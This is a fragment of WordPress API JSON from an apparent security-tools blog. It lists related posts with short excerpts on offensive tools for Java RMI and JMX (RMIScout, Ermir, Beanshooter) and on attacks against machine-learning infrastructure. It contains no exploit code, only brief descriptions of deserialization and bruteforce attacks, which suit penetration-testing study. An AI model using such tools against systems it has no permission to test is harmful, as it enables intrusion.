Tools","link":"https:\/\/kalilinuxtutorials.com\/category\/et\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh4tO6A0RLNNiVhbAzntQ9ED5EBgk_6B9ufxt5cXruiyv3b83EGkPEN_uz_tbduj_0i3h5D-McRpdkkDKfRhZtAQLoLDEbDhuMCgywOhe2mrgYdOvHdWudB6DVeOgSCBEazBHDPRgPRPyxTkzUSC0-BDdoHSiQusmHEbQ3-SA5KJcoeik3vTAPptHlXjnOm\/s16000\/JYso%20.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh4tO6A0RLNNiVhbAzntQ9ED5EBgk_6B9ufxt5cXruiyv3b83EGkPEN_uz_tbduj_0i3h5D-McRpdkkDKfRhZtAQLoLDEbDhuMCgywOhe2mrgYdOvHdWudB6DVeOgSCBEazBHDPRgPRPyxTkzUSC0-BDdoHSiQusmHEbQ3-SA5KJcoeik3vTAPptHlXjnOm\/s16000\/JYso%20.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh4tO6A0RLNNiVhbAzntQ9ED5EBgk_6B9ufxt5cXruiyv3b83EGkPEN_uz_tbduj_0i3h5D-McRpdkkDKfRhZtAQLoLDEbDhuMCgywOhe2mrgYdOvHdWudB6DVeOgSCBEazBHDPRgPRPyxTkzUSC0-BDdoHSiQusmHEbQ3-SA5KJcoeik3vTAPptHlXjnOm\/s16000\/JYso%20.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh4tO6A0RLNNiVhbAzntQ9ED5EBgk_6B9ufxt5cXruiyv3b83EGkPEN_uz_tbduj_0i3h5D-McRpdkkDKfRhZtAQLoLDEbDhuMCgywOhe2mrgYdOvHdWudB6DVeOgSCBEazBHDPRgPRPyxTkzUSC0-BDdoHSiQusmHEbQ3-SA5KJcoeik3vTAPptHlXjnOm\/s16000\/JYso%20.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh4tO6A0RLNNiVhbAzntQ9ED5EBgk_6B9ufxt5cXruiyv3b83EGkPEN_uz_tbduj_0i3h5D-McRpdkkDKfRhZtAQLoLDEbDhuMCgywOhe2mrgYdOvHdWudB6DVeOgSCBEazBHDPRgPRPyxTkzUSC0-BDdoHSiQusmHEbQ3-SA5KJcoeik3vTAPptHlXjnOm\/s16000\/JYso%20.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh4tO6A0RLNNiVhbAzntQ9ED5EBgk_6B9ufxt5cXruiyv3b83EGkPEN_uz_tbduj_0i3h5D-McRpdkkDKfRhZtAQLoLDEbDhuMCgywOhe2mrgYdOvHdWudB6DVeOgSCBEazBHDPRgPRPyxTkzUSC0-BDdoHSiQusmHEbQ3-SA5KJcoeik3vTAPptHlXjnOm\/s16000\/JYso%20.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":10841,"url":"https:\/\/kalilinuxtutorials.com\/rmiscout\/","url_meta":{"origin":23516,"position":2},"title":"RMIScout : Bruteforce Attacks Against Exposed Java RMI Interfaces","author":"R K","date":"June 25, 2020","format":false,"excerpt":"RMIScout performs wordlist and bruteforce attacks against exposed Java RMI interfaces to safely guess method signatures without invocation. On misconfigured servers, any known RMI signature using non-primitive types (e.g., java.lang.String), can be exploited by replacing the object with a serialized payload. This is a fairly common misconfiguration (e.g., VMWare vSphere\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":27579,"url":"https:\/\/kalilinuxtutorials.com\/ermir\/","url_meta":{"origin":23516,"position":3},"title":"Ermir : An Evil Java RMI Registry","author":"R K","date":"November 10, 2022","format":false,"excerpt":"Ermir is an Evil\/Rogue RMI Registry, it exploits unsecure deserialization on any Java code calling standard RMI methods on it (list()\/lookup()\/bind()\/rebind()\/unbind()). Requirements Ruby v3 or newer. Installation Install Ermir from rubygems.org: $ gem install ermir or clone the repo and build the gem: $ git clone https:\/\/github.com\/hakivvi\/ermir.git $ rake install\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjs0PFlzsSnfe85aNQc_FShca44LCkQH_aHLc-TV-ZbtgA3TBczSYJYI2V2XETlue8F7CBBccQy1unuscXX5iAxieKRCjcpmBqTBnJ2KZhKMg_cVOYUggnzr_cVo9ooQK0UbKa0I29G6IWjnanM09o7kaGdnz1k2UBFon5dRxmECNRHxsmL6K0fDTdq\/s728\/Ermir.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjs0PFlzsSnfe85aNQc_FShca44LCkQH_aHLc-TV-ZbtgA3TBczSYJYI2V2XETlue8F7CBBccQy1unuscXX5iAxieKRCjcpmBqTBnJ2KZhKMg_cVOYUggnzr_cVo9ooQK0UbKa0I29G6IWjnanM09o7kaGdnz1k2UBFon5dRxmECNRHxsmL6K0fDTdq\/s728\/Ermir.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjs0PFlzsSnfe85aNQc_FShca44LCkQH_aHLc-TV-ZbtgA3TBczSYJYI2V2XETlue8F7CBBccQy1unuscXX5iAxieKRCjcpmBqTBnJ2KZhKMg_cVOYUggnzr_cVo9ooQK0UbKa0I29G6IWjnanM09o7kaGdnz1k2UBFon5dRxmECNRHxsmL6K0fDTdq\/s728\/Ermir.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjs0PFlzsSnfe85aNQc_FShca44LCkQH_aHLc-TV-ZbtgA3TBczSYJYI2V2XETlue8F7CBBccQy1unuscXX5iAxieKRCjcpmBqTBnJ2KZhKMg_cVOYUggnzr_cVo9ooQK0UbKa0I29G6IWjnanM09o7kaGdnz1k2UBFon5dRxmECNRHxsmL6K0fDTdq\/s728\/Ermir.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":15108,"url":"https:\/\/kalilinuxtutorials.com\/beanshooter\/","url_meta":{"origin":23516,"position":4},"title":"Beanshooter : JMX Enumeration And Attacking Tool","author":"R K","date":"July 27, 2021","format":false,"excerpt":"Beanshooter\u00a0is a command line tool written in\u00a0Java, which helps to identify common vulnerabilities on\u00a0JMX\u00a0endpoints. Introduction JMX\u00a0stands for\u00a0Java Management Extensions\u00a0and can be used to monitor and configure the\u00a0Java Virtual Machine\u00a0from remote. Applications like\u00a0tomcat\u00a0or\u00a0JBoss\u00a0are often installed together with a\u00a0JMX\u00a0instance, which enables server administrators to monitor and manage the corresponding application. JMX\u00a0uses so\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":31801,"url":"https:\/\/kalilinuxtutorials.com\/ai-exploits\/","url_meta":{"origin":23516,"position":5},"title":"AI Exploits &#8211; Vulnerabilities And Threats In Machine Learning Infrastructure","author":"Varshini","date":"January 23, 2024","format":false,"excerpt":"The AI world has a security problem and it's not just in the inputs given to LLMs such as ChatGPT. Based on research done by\u00a0Protect AI\u00a0and independent security experts on the\u00a0Huntr\u00a0Bug Bounty Platform, there are far more impactful and practical attacks against the tools, libraries and frameworks used to build,\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhZzg84d8hyphenhyphen4UdC7XxbpEWEQyrheEtPTbtCSyB_NQlbRiQJVJhV0TNSdzhxr2mLc7ObE9DceiHaMdwf9AFtCNOAj9C9ZIDoeE_rac6EA6hYAb0M-uyGGxr82OfSz3TYb2xU2LSPhqQ0riMMIEohP0Ju449Y-T_OTPaSZd_D-UCk-3jMqrKG5pEjC-MNoSx4\/s16000\/Untitled%20design%20%288%29.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhZzg84d8hyphenhyphen4UdC7XxbpEWEQyrheEtPTbtCSyB_NQlbRiQJVJhV0TNSdzhxr2mLc7ObE9DceiHaMdwf9AFtCNOAj9C9ZIDoeE_rac6EA6hYAb0M-uyGGxr82OfSz3TYb2xU2LSPhqQ0riMMIEohP0Ju449Y-T_OTPaSZd_D-UCk-3jMqrKG5pEjC-MNoSx4\/s16000\/Untitled%20design%20%288%29.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhZzg84d8hyphenhyphen4UdC7XxbpEWEQyrheEtPTbtCSyB_NQlbRiQJVJhV0TNSdzhxr2mLc7ObE9DceiHaMdwf9AFtCNOAj9C9ZIDoeE_rac6EA6hYAb0M-uyGGxr82OfSz3TYb2xU2LSPhqQ0riMMIEohP0Ju449Y-T_OTPaSZd_D-UCk-3jMqrKG5pEjC-MNoSx4\/s16000\/Untitled%20design%20%288%29.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhZzg84d8hyphenhyphen4UdC7XxbpEWEQyrheEtPTbtCSyB_NQlbRiQJVJhV0TNSdzhxr2mLc7ObE9DceiHaMdwf9AFtCNOAj9C9ZIDoeE_rac6EA6hYAb0M-uyGGxr82OfSz3TYb2xU2LSPhqQ0riMMIEohP0Ju449Y-T_OTPaSZd_D-UCk-3jMqrKG5pEjC-MNoSx4\/s16000\/Untitled%20design%20%288%29.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhZzg84d8hyphenhyphen4UdC7XxbpEWEQyrheEtPTbtCSyB_NQlbRiQJVJhV0TNSdzhxr2mLc7ObE9DceiHaMdwf9AFtCNOAj9C9ZIDoeE_rac6EA6hYAb0M-uyGGxr82OfSz3TYb2xU2LSPhqQ0riMMIEohP0Ju449Y-T_OTPaSZd_D-UCk-3jMqrKG5pEjC-MNoSx4\/s16000\/Untitled%20design%20%288%29.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhZzg84d8hyphenhyphen4UdC7XxbpEWEQyrheEtPTbtCSyB_NQlbRiQJVJhV0TNSdzhxr2mLc7ObE9DceiHaMdwf9AFtCNOAj9C9ZIDoeE_rac6EA6hYAb0M-uyGGxr82OfSz3TYb2xU2LSPhqQ0riMMIEohP0Ju449Y-T_OTPaSZd_D-UCk-3jMqrKG5pEjC-MNoSx4\/s16000\/Untitled%20design%20%288%29.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/23516","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=23516"}],"version-history":[{"count":8,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/23516\/revisions"}],"predecessor-version":[{"id":23638,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/23516\/revisions\/23638"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media\/23525"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=23516"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=23516"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=23516"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}